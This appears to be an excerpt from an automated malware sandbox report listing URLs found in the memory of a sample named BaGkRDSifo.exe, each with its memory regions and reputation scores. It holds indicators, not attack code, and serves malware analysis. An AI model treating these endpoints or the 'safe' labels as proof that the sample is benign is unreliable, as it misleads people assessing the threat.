            http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://com.wondersgroup.jkda.application.modules.webserviceBaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://tempuri.org/DownloadReportFormIDListByBarcodeNoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ReportDetailForHzqbTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/UpLoadXmlTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/UpgradeRequestFormTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetXmmcListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/GetReportUriTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://47.104.173.216:BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://47.104.173.216:9876BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000035ED000.00000004.00000800.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003600000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/HelloWorldTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/TBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSampleCountTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/LoginTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://11.65.9.11:9082/jkda/webservice/DPServiceBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/getPatResultNoXmlTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetByteReportTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportListV1TBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://com.wondersgroup.jkda.application.modules.webserviceTUBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ExistsReportOtherTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetInputXmmcListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportBaseInfoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchSampleTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/CheckUpLoadReportFromBytesTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetBLTCTPicByKeyIdTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/UpLoadOrDownLoadByXmlTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/DetailListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportUserItemByYYTMTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportUserItemTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppUpLoadXmlTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetAllSampleList_MeiNianTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/AppliyUpLoadTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/GetReportFormColumnTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/retrieveDocumentViewInfoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportItemListByAdiconBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/UpLoadRequestFormClientTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportItemListByAdiconRepnoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/ChangestatusTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadReportByReportFormIDTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeToByteTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/SetSampleDownFlagByByAdiconRepnoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/MeiNianOriginalDataXmlUpLoadTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/UpLoadReportFromBytes_ImageListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
